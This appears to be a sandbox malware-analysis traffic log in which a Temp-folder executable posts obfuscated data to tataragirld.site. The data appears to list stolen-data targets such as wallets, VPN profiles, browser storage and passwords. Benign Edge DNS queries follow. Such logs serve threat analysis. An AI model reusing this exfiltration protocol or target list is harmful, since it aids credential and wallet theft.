                                                                                                                                                                                                                                                                                                2025-01-07 12:18:55 UTC513INData Raw: 33 32 66 32 0d 0a 87 86 00 00 9f df e8 1e 00 00 00 00 00 00 00 00 0d 00 c3 04 14 00 f8 03 69 10 18 05 07 03 df 08 df 36 f8 03 78 b1 77 a6 3d 50 99 33 75 73 6d 5f 53 71 6c 77 6c 6d 55 53 4d 08 00 65 01 14 00 7f 06 1d 10 18 05 07 03 cc 08 cc 36 7f 06 aa 49 5d cd 2d cd b0 e1 a4 4b 94 f0 ea cb c0 a1 08 00 b6 02 14 00 34 0e 93 10 18 05 07 03 cc 08 cc 36 34 0e 2d 13 fe 36 73 56 b9 6b dc ee c8 f4 4b af 36 d4 04 00 43 03 10 00 44 01 b5 10 18 05 07 03 dc 04 dc 36 44 01 6e fd a9 e8 02 83 5f 37 04 00 4e 04 14 00 7f 09 8b 10 18 05 07 03 df 08 df 36 7f 09 78 b1 77 a6 3d 50 99 33 60 6b 62 77 08 00 f2 0c 14 00 c7 0c 8e 10 18 05 07 03 df 08 df 36 c7 0c 78 b1 77 a6 3d 50 99 33 54 66 61 23 47 62 77 62 05 00 6c 06 14 00 00 0c 8e 10 18 05 07 03 df 08 df 36 00 0c 78 b1 77 a6
                                                                                                                                                                                                                                                                                                Data Ascii: 32f2i6xw=P3usm_SqlwlmUSMe6I]-K464-6sVkK6CD6Dn_7N6xw=P3`kbw6xw=P3Tfa#Gbwbl6xw
                                                                                                                                                                                                                                                                                                2025-01-07 12:18:55 UTC1369INData Raw: 05 07 03 dc 04 dc 36 a4 05 a7 04 fe 83 cb 7a 08 5c 1c 00 ff 04 14 00 de 05 b5 10 18 05 07 03 df 08 df 36 de 05 78 b1 77 a6 3d 50 99 33 44 76 62 71 67 62 5f 4f 6c 60 62 6f 23 50 77 6c 71 62 64 66 5f 6f 66 75 66 6f 67 61 07 00 e9 0a 14 00 e6 06 a6 10 18 05 07 03 df 08 df 36 e6 06 78 b1 77 a6 3d 50 99 33 51 66 62 6f 55 4d 40 08 00 57 02 14 00 fd 00 ee 10 18 05 07 03 cc 08 cc 36 fd 00 ff 9f 1b 9a e1 70 8a f1 0d 62 2d 58 d9 89 05 4e 08 00 bd 0a 14 00 f6 01 8e 10 18 05 07 03 cc 08 cc 36 f6 01 a1 1d 83 6b f1 b1 aa 49 5a e0 b5 a9 c9 48 25 f6 3c 00 2e 04 14 00 77 03 8e 10 18 05 07 03 df 08 df 36 77 03 78 b1 77 a6 3d 50 99 33 40 39 5f 53 71 6c 64 71 62 6e 23 45 6a 6f 66 70 23 2b 7b 3b 35 2a 5f 4e 6a 60 71 6c 70 6c 65 77 5f 46 67 64 66 5f 42 73 73 6f 6a 60 62 77 6a
                                                                                                                                                                                                                                                                                                Data Ascii: 6z\6xw=P3Dvbqgb_Ol`bo#Pwlqbdf_ofufoga6xw=P3QfboUM@W6pb-XN6kIZH%<.w6wxw=P3@9_Sqldqbn#Ejofp#+{;5*_Nj`qlplew_Fgdf_Bssoj`bwj
                                                                                                                                                                                                                                                                                                2025-01-07 12:18:55 UTC1369INData Raw: 07 03 df 08 df 36 0f 0a 78 b1 77 a6 3d 50 99 33 56 6d 70 66 6d 77 23 4e 66 70 70 62 64 66 70 04 00 99 0f 10 00 9e 05 69 10 18 05 07 03 dc 04 dc 36 9e 05 78 5f 6a 2c 15 c0 69 f6 09 00 c4 02 14 00 c6 04 93 10 18 05 07 03 df 08 df 36 c6 04 78 b1 77 a6 3d 50 99 33 29 73 62 67 67 6a 6d 64 29 15 00 28 0b 14 00 92 00 ab 10 18 05 07 03 df 08 df 36 92 00 78 b1 77 a6 3d 50 99 33 70 6b 6c 71 77 60 76 77 70 2e 60 76 70 77 6c 6e 2d 69 70 6c 6d 58 00 f9 0a 14 00 af 01 93 10 18 05 07 03 df 08 df 36 af 01 78 b1 77 a6 3d 50 99 33 50 6c 65 77 74 62 71 66 5f 4e 6a 60 71 6c 70 6c 65 77 5f 4c 65 65 6a 60 66 5f 32 35 2d 33 5f 4c 76 77 6f 6c 6c 68 5f 53 71 6c 65 6a 6f 66 70 5f 4c 76 77 6f 6c 6c 68 5f 3a 30 34 36 40 45 45 33 37 32 30 32 32 32 67 30 41 3b 3b 42 33 33 32 33 37 41
                                                                                                                                                                                                                                                                                                Data Ascii: 6xw=P3Vmpfmw#Nfppbdfpi6x_j,i6xw=P3)sbggjmd)(6xw=P3pklqw`vwp.`vpwln-iplmX6xw=P3Plewtbqf_Nj`qlplew_Leej`f_25-3_Lvwollh_Sqlejofp_Lvwollh_:046@EE3720222g0A;;B33237A
                                                                                                                                                                                                                                                                                                2025-01-07 12:18:55 UTC1369INData Raw: 77 a6 3d 50 99 33 51 66 62 6f 55 4d 40 08 00 93 08 14 00 7a 02 8e 10 18 05 07 03 cc 08 cc 36 7a 02 ca f5 cb e1 9a 89 2e c6 09 08 fd 23 a2 70 a1 79 04 00 0f 02 10 00 3f 0c b5 10 18 05 07 03 dc 04 dc 36 3f 0c ce de a7 34 a8 41 a4 ee 08 00 74 0e 14 00 2a 0d 49 10 18 05 07 03 df 08 df 36 2a 0d 78 b1 77 a6 3d 50 99 33 56 70 66 71 4d 62 6e 66 11 00 47 01 14 00 59 0b a6 10 18 05 07 03 df 08 df 36 59 0b 78 b1 77 a6 3d 50 99 33 50 4c 45 57 54 42 51 46 5f 57 6a 64 66 71 55 4d 40 07 00 46 08 14 00 44 06 93 10 18 05 07 03 df 08 df 36 44 06 78 b1 77 a6 3d 50 99 33 4c 76 77 6f 6c 6c 68 04 00 b5 03 10 00 c3 08 82 10 18 05 07 03 dc 04 dc 36 c3 08 af 18 c0 45 c2 87 c3 9f 08 00 5f 0f 14 00 a8 0e 93 10 18 05 07 03 cc 08 cc 36 a8 0e c0 28 fb 59 33 3d 7b 94 31 d5 cd 9b 0b c4
                                                                                                                                                                                                                                                                                                Data Ascii: w=P3QfboUM@z6z.#py?6?4At*I6*xw=P3VpfqMbnfGY6Yxw=P3PLEWTBQF_WjdfqUM@FD6Dxw=P3Lvwollh6E_6(Y3={1
                                                                                                                                                                                                                                                                                                2025-01-07 12:18:55 UTC1369INData Raw: b5 66 8c 61 24 00 7d 06 14 00 9f 08 8e 10 18 05 07 03 df 08 df 36 9f 08 78 b1 77 a6 3d 50 99 33 44 6c 6c 64 6f 66 5f 40 6b 71 6c 6e 66 5f 42 73 73 6f 6a 60 62 77 6a 6c 6d 5f 60 6b 71 6c 6e 66 2d 66 7b 66 04 00 2c 0e 10 00 e2 02 a6 10 18 05 07 03 dc 04 dc 36 e2 02 33 0e 07 b5 5e 91 04 6f 08 00 bc 0b 14 00 df 0e 8e 10 18 05 07 03 cc 08 cc 36 df 0e fc 83 a2 71 b8 0e a8 cb e5 7d 94 b3 80 f7 27 74 04 00 be 0b 10 00 39 08 93 10 18 05 07 03 dc 04 dc 36 39 08 73 6b 33 8d 1e f4 30 57 08 00 5c 09 14 00 4b 04 b5 10 18 05 07 03 df 08 df 36 4b 04 78 b1 77 a6 3d 50 99 33 46 75 66 71 50 76 71 65 16 00 46 04 14 00 ea 08 a6 10 18 05 07 03 df 08 df 36 ea 08 78 b1 77 a6 3d 50 99 33 75 6d 60 5f 57 6a 64 66 71 55 4d 40 5f 67 62 77 62 2d 69 70 6c 6d 04 00 2c 0b 10 00 f0 07 a6
                                                                                                                                                                                                                                                                                                Data Ascii: fa$}6xw=P3Dlldof_@kqlnf_Bssoj`bwjlm_`kqlnf-f{f,63^o6q}'t969sk30W\K6Kxw=P3FufqPvqeF6xw=P3um`_WjdfqUM@_gbwb-iplm,
                                                                                                                                                                                                                                                                                                2025-01-07 12:18:55 UTC1369INData Raw: 88 ed 08 00 08 0a 14 00 c0 0a b5 10 18 05 07 03 cc 08 cc 36 c0 0a 0a a1 29 0d fc 1d be d1 fb 5c 1f cf c4 e4 31 6e 0b 00 84 02 14 00 14 0c 8e 10 18 05 07 03 df 08 df 36 14 0c 78 b1 77 a6 3d 50 99 33 41 71 62 75 66 54 62 6f 6f 66 77 08 00 99 07 14 00 00 07 93 10 18 05 07 03 df 08 df 36 00 07 78 b1 77 a6 3d 50 99 33 42 6f 6f 23 4e 62 6a 6f 0b 00 72 02 14 00 f8 04 b5 10 18 05 07 03 df 08 df 36 f8 04 78 b1 77 a6 3d 50 99 33 41 6a 77 60 6c 6a 6d 40 6c 71 66 0a 00 79 06 14 00 23 05 8e 10 18 05 07 03 df 08 df 36 23 05 78 b1 77 a6 3d 50 99 33 4f 6c 64 6a 6d 23 47 62 77 62 05 00 51 09 14 00 ae 03 a6 10 18 05 07 03 df 08 df 36 ae 03 78 b1 77 a6 3d 50 99 33 29 2d 61 66 67 04 00 ac 04 10 00 81 00 93 10 18 05 07 03 dc 04 dc 36 81 00 a3 6d e8 84 cf f6 eb 5e 05 00 45 0c
                                                                                                                                                                                                                                                                                                Data Ascii: 6)\1n6xw=P3AqbufTboofw6xw=P3Boo#Nbjor6xw=P3Ajw`ljm@lqfy#6#xw=P3Oldjm#GbwbQ6xw=P3)-afg6m^E
                                                                                                                                                                                                                                                                                                2025-01-07 12:18:55 UTC1369INData Raw: 4b 6a 70 77 6c 71 7a 08 00 08 0c 14 00 4a 0c 93 10 18 05 07 03 df 08 df 36 4a 0c 78 b1 77 a6 3d 50 99 33 50 66 77 77 6a 6d 64 70 20 00 ab 0d 14 00 ee 03 8e 10 18 05 07 03 df 08 df 36 ee 03 78 b1 77 a6 3d 50 99 33 41 71 62 75 66 54 62 6f 6f 66 77 5f 41 71 62 75 66 23 54 62 6f 6f 66 77 23 50 77 6c 71 62 64 66 04 00 0b 04 10 00 87 02 8e 10 18 05 07 03 dc 04 dc 36 87 02 57 5d 15 4f 3b 23 e3 90 39 00 2d 02 14 00 de 0e 93 10 18 05 07 03 df 08 df 36 de 0e 78 b1 77 a6 3d 50 99 33 50 4c 45 57 54 42 51 46 5f 4e 6a 60 71 6c 70 6c 65 77 5f 4c 65 65 6a 60 66 5f 32 35 2d 33 5f 40 6c 6e 6e 6c 6d 5f 4a 67 66 6d 77 6a 77 7a 5f 4a 67 66 6d 77 6a 77 6a 66 70 29 00 b3 0a 14 00 ed 05 49 10 18 05 07 03 df 08 df 36 ed 05 78 b1 77 a6 3d 50 99 33 50 6c 65 77 74 62 71 66 5f 4e 62
                                                                                                                                                                                                                                                                                                Data Ascii: KjpwlqzJ6Jxw=P3Pfwwjmdp 6xw=P3AqbufTboofw_Aqbuf#Tboofw#Pwlqbdf6W]O;#9-6xw=P3PLEWTBQF_Nj`qlplew_Leej`f_25-3_@lnnlm_Jgfmwjwz_Jgfmwjwjfp)I6xw=P3Plewtbqf_Nb
                                                                                                                                                                                                                                                                                                2025-01-07 12:18:55 UTC1369INData Raw: 6d 62 71 7a 06 00 b0 06 14 00 37 0b a6 10 18 05 07 03 df 08 df 36 37 0b 78 b1 77 a6 3d 50 99 33 29 2d 69 71 6f 66 04 00 90 0e 10 00 7c 0d 69 10 18 05 07 03 dc 04 dc 36 7c 0d 15 cd ee ed 79 56 ed 37 46 00 59 07 14 00 70 09 a6 10 18 05 07 03 df 08 df 36 70 09 78 b1 77 a6 3d 50 99 33 75 6d 60 5f 51 66 62 6f 55 4d 40 5f 60 6f 6a 66 6d 77 5f 4f 6c 60 62 6f 42 73 73 47 62 77 62 5f 75 6d 60 75 6a 66 74 66 71 2d 67 5f 73 62 70 70 74 6c 71 67 70 2d 67 66 60 71 7a 73 77 66 67 2e 6e 62 70 77 66 71 04 00 62 06 10 00 97 04 69 10 18 05 07 03 dc 04 dc 36 97 04 6d 39 83 09 03 a6 80 d3 04 00 9d 06 10 00 00 0a 8e 10 18 05 07 03 dc 04 dc 36 00 0a 0c d9 61 d9 60 a7 97 06 04 00 50 0d 10 00 70 0b 93 10 18 05 07 03 dc 04 dc 36 70 0b 65 1e 80 16 08 81 83 cc 08 00 1c 09 14 00 d4
                                                                                                                                                                                                                                                                                                Data Ascii: mbqz767xw=P3)-iqof|i6|yV7FYp6pxw=P3um`_QfboUM@_`ojfmw_Ol`boBssGbwb_um`ujftfq-g_sbpptlqgp-gf`qzswfg.nbpwfqbi6m96a`Pp6pe
                                                                                                                                                                                                                                                                                                2025-01-07 12:18:55 UTC1369INData Raw: d2 e9 ae 26 d1 33 11 00 7b 03 14 00 a8 0c a6 10 18 05 07 03 df 08 df 36 a8 0c 78 b1 77 a6 3d 50 99 33 40 6c 6d 6d 66 60 77 6a 6c 6d 42 67 67 71 66 70 70 08 00 f5 0e 14 00 e8 0c 8b 10 18 05 07 03 cc 08 cc 36 e8 0c c7 84 e3 e2 6c a1 3b 25 36 79 d5 20 54 58 b4 9a 04 00 b6 09 10 00 9e 0c 93 10 18 05 07 03 dc 04 dc 36 9e 0c f9 01 96 2f 94 9e 95 f5 0b 00 ee 0d 14 00 14 00 a6 10 18 05 07 03 df 08 df 36 14 00 78 b1 77 a6 3d 50 99 33 75 6d 60 60 6b 62 77 2d 7b 6e 6f 08 00 a6 09 14 00 cc 09 93 10 18 05 07 03 cc 08 cc 36 cc 09 04 29 70 d4 d2 e1 b1 1a f5 d4 46 16 ea 18 3e a5 1c 00 c9 09 14 00 74 0b b5 10 18 05 07 03 df 08 df 36 74 0b 78 b1 77 a6 3d 50 99 33 74 62 6f 6f 66 77 70 5f 46 7b 6c 67 76 70 5f 66 7b 6c 67 76 70 2d 74 62 6f 6f 66 77 4f 00 c1 08 14 00 8e 04 8e
                                                                                                                                                                                                                                                                                                Data Ascii: &3{6xw=P3@lmmf`wjlmBggqfpp6l;%6y TX6/6xw=P3um``kbw-{no6)pF>t6txw=P3tboofwp_F{lgvp_f{lgvp-tboofwO


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                1192.168.2.749976188.114.97.34431532C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2025-01-07 12:18:56 UTC500OUTPOST /2009_New_England_Patriots_season?omlxpbik85mer=%2BBA7Gis1n3XVmJgLCG%2BgLgGVQ1E79NkVzyEnWTmwcxfStdd4il28zJlLoAzjvUO%2BK%2B3IAZfOMRKWTcb%2Fuzy%2FRA%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0
                                                                                                                                                                                                                                                                                                page: DixBvHnlcM48PxLEc7IjwhmUek35rWnNFExDdZ/M9Mft+Zrs5gy+OkNPDkoJDBS1rnOJb3cy5rolkjMpj17XEomZYCIlqHEt59N5hw
                                                                                                                                                                                                                                                                                                Content-Length: 53
                                                                                                                                                                                                                                                                                                Host: tataragirld.site
                                                                                                                                                                                                                                                                                                2025-01-07 12:18:56 UTC53OUTData Raw: 03 00 00 00 fd ff ff ff 00 00 00 00 00 00 00 00 92 00 03 02 00 00 00 fe ff ff ff 00 00 00 00 00 00 00 00 91 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                                                                                                                2025-01-07 12:18:56 UTC746INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Date: Tue, 07 Jan 2025 12:18:56 GMT
                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KJBVpGoq3KKJgdZL6rVJCDvmHmOSJ%2FQHCanqNTCk%2Bw0%2BbMDl0NemsNOri4yz3Iv13gbms05NNorLW5GkJWhtwfYoEgeWFeMUd4cOAhnbQ6CRuf9aw4EfFtBm9GY5rK4zHZ0h"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                CF-RAY: 8fe3e4af1ed88c84-EWR
                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1836&min_rtt=1833&rtt_var=694&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1189&delivery_rate=1570736&cwnd=176&unsent_bytes=0&cid=bf60582178e42004&ts=314&x=0"
                                                                                                                                                                                                                                                                                                2025-01-07 12:18:56 UTC24INData Raw: 31 32 0d 0a 02 00 00 00 fe ff ff ff 00 00 00 00 00 00 00 00 91 90 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: 12
                                                                                                                                                                                                                                                                                                2025-01-07 12:18:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                2192.168.2.749977188.114.97.34431532C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2025-01-07 12:18:57 UTC501OUTPOST /2009_New_England_Patriots_season?omlxpbik85mer=%2BBA7Gis1n3XVmJgLCG%2BgLgGVQ1E79NkVzyEnWTmwcxfStdd4il28zJlLoAzjvUO%2BK%2B3IAZfOMRKWTcb%2Fuzy%2FRA%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0
                                                                                                                                                                                                                                                                                                page: DixBvHnlcM48PxLEc7IjwhmUek35rWnNFExDdZ/M9Mft+Zrs5gy+OkNPDkoJDBS1rnOJb3cy5rolkjMpj17XEomZYCIlqHEt59N5hw
                                                                                                                                                                                                                                                                                                Content-Length: 208
                                                                                                                                                                                                                                                                                                Host: tataragirld.site
                                                                                                                                                                                                                                                                                                2025-01-07 12:18:57 UTC208OUTData Raw: 03 00 00 00 fd ff ff ff 00 00 00 00 00 00 00 00 92 00 01 95 00 00 00 41 ea 24 12 88 00 00 00 08 00 00 00 00 03 03 03 42 e9 27 11 03 03 03 03 03 03 03 03 91 c3 93 61 03 03 03 42 e9 27 11 03 03 03 03 03 03 03 03 53 48 05 05 2f 03 03 03 03 03 03 03 2e 03 2e 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 53 48 05 04 03 03 03 03 03 03 03 03 03 03 03 03 02 03 03 03 53 48 06 05 03 03 03 03 fc fc fc fc fc fc fc fc fc fc fc fc 03 03 fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc 78 a6 e5 24 53 87 99 33 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                                                                                                                                                Data Ascii: A$B'aB'SH/..SHSHx$S3
                                                                                                                                                                                                                                                                                                2025-01-07 12:18:57 UTC844INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                Date: Tue, 07 Jan 2025 12:18:57 GMT
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                ontent: DixBvHnlcM48PxLEc7IjwhmUek35rWnNFExDdZ/M9Mft+Zrs5gy+OkNPDkoJDBS1rnOJb3cy5rolkjMpj17XEomZYCIlqHEt59N5hw
                                                                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FnAF0JlxdHa7TWTg85Xyy4dclgdKO8eKblmr9r5s9%2BHQODk8c0yqbkE%2FVtfmtDu1%2B6jUbY7xnw2dxuN4c8AvtMY8pdyS%2F4BafYvZs8bManhGyEheOPPipm0%2F9Pr0ST9YkXtz"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                CF-RAY: 8fe3e4b489708cb4-EWR
                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1966&min_rtt=1953&rtt_var=758&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1345&delivery_rate=1419543&cwnd=189&unsent_bytes=0&cid=e061af22fb620dac&ts=305&x=0"


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                3192.168.2.750013172.64.41.34432516C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:09 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                Content-Length: 128
                                                                                                                                                                                                                                                                                                Accept: application/dns-message
                                                                                                                                                                                                                                                                                                Accept-Language: *
                                                                                                                                                                                                                                                                                                User-Agent: Chrome
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:09 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:09 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                Date: Tue, 07 Jan 2025 12:19:09 GMT
                                                                                                                                                                                                                                                                                                Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                Content-Length: 468
                                                                                                                                                                                                                                                                                                CF-RAY: 8fe3e50179224213-EWR
                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:09 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 f2 00 04 8e fa 50 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                Data Ascii: wwwgstaticcomPc)


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                4192.168.2.750014172.64.41.34432516C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:09 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                Content-Length: 128
                                                                                                                                                                                                                                                                                                Accept: application/dns-message
                                                                                                                                                                                                                                                                                                Accept-Language: *
                                                                                                                                                                                                                                                                                                User-Agent: Chrome
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:09 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:09 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                Date: Tue, 07 Jan 2025 12:19:09 GMT
                                                                                                                                                                                                                                                                                                Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                Content-Length: 468
                                                                                                                                                                                                                                                                                                CF-RAY: 8fe3e50198f38c1b-EWR
                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:09 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 19 00 04 8e fa 48 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                Data Ascii: wwwgstaticcomHc)


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                5192.168.2.750015162.159.61.34432516C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:09 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                Content-Length: 128
                                                                                                                                                                                                                                                                                                Accept: application/dns-message
                                                                                                                                                                                                                                                                                                Accept-Language: *
                                                                                                                                                                                                                                                                                                User-Agent: Chrome
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:09 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                                2025-01-07 12:19:09 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                Date: Tue, 07 Jan 2025 12:19:09 GMT
                                                                                                                                                                                                                                                                                                Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                Connection: close
